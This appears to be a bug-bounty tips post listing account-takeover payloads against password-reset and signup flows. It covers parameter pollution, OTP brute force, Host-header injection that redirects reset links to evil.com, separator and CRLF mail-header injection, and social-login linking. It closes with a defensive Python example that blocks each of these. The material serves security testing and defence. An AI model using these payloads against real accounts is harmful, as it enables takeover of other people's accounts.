---
title: Account Takeover Tips
author: Elsfa7-110
categories: [XSS, ATO]
tags: [ATO]
pin: true
---

# Account Takeover
- Parameter pollution in reset password

```http
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
```
- Bruteforce the OTP code

```http
POST /reset
[...]
email=victim@mail.com&code=$123456$
```
- Host header injection

```http
POST /reset
Host: evil.com
[...]
email=victim@mail.com
```

```http
POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[...]
email=victim@mail.com
```

The victim then receives a reset link that points to evil.com.
- Using a separator in the value of the parameter

```http
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
```

```http
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
```

```http
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
```

```http
POST /reset
[...]
email=victim@mail.com%00hacker@mail.com
```
- No domain in the value of the parameter

```http
POST /reset
[...]
email=victim
```
- No TLD in the value of the parameter

```http
POST /reset
[...]
email=victim@mail
```
- Using carbon copy (header injection into the mail)

```http
POST /reset
[...]
email=victim@mail.com%0a%0dcc:hacker@mail.com
```
- Try re-signing up using the same email

```http
POST /newaccount
[...]
email=victim@mail.com&password=1234
```

After signing up with the victim's email, try to sign up again with a different password:

```http
POST /newaccount
[...]
email=victim@mail.com&password=hacked
```
- If there is JSON data in the request body, add a comma

```http
POST /newaccount
[...]
{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
```
- Account takeover after login (works if the website offers "Connect to facebook/twitter/etc")
  - First, log in to the website using the victim's email
  - Find "Connect to facebook/twitter/googleplus" or something similar
  - Connect the account to the attacker's twitter
  - After logging out, you can log in using that twitter account
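The server-side checks that close the reset-flow and signup items above (parameter pollution, separators and cc injection in `email`, missing domain or TLD, Host-header-derived links, OTP brute force, re-signup over an existing account), written here as an added example and not code from the original post. `RESET_ORIGIN`, `MAX_OTP_ATTEMPTS` and the function names are assumptions for illustration.

```python
import hmac
import re
from urllib.parse import parse_qsl

# Exactly one address: local part, "@", then a domain with at least one dot (a TLD is present).
# Anything else (",", "|", space, NUL, CR/LF, a second "@") fails to match.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
# Assumption: the site's canonical origin, fixed in configuration. Reset links are built
# from this value only, never from the Host or X-Forwarded-Host request headers.
RESET_ORIGIN = "https://accounts.example.com"
MAX_OTP_ATTEMPTS = 5


def reset_recipient(body):
    """Return the single address a reset mail may go to, or None to reject the request."""
    emails = [v for k, v in parse_qsl(body, keep_blank_values=True) if k == "email"]
    if len(emails) != 1:                   # email=victim&email=hacker (parameter pollution)
        return None
    if not EMAIL_RE.fullmatch(emails[0]):  # separators, %00, %0a%0dcc:, no domain, no TLD
        return None
    return emails[0]


def reset_link(token, host_header=None):
    """host_header is accepted only to make the point explicit: it is ignored on purpose."""
    return f"{RESET_ORIGIN}/reset/confirm?token={token}"


class OtpCheck:
    """One reset code, a bounded number of guesses, then the code is dead either way."""

    def __init__(self, code, max_attempts=MAX_OTP_ATTEMPTS):
        self._code = code.encode()
        self._left = max_attempts
        self.spent = False

    def verify(self, submitted):
        if self.spent:
            return False
        self._left -= 1
        ok = hmac.compare_digest(self._code, submitted.encode())  # constant-time compare
        if ok or self._left == 0:
            self.spent = True              # success consumes the code; exhaustion burns it
        return ok


def signup_allowed(existing_emails, email):
    """Re-signup with an address that already has an account must not overwrite it."""
    taken = {e.casefold() for e in existing_emails}
    return EMAIL_RE.fullmatch(email) is not None and email.casefold() not in taken
```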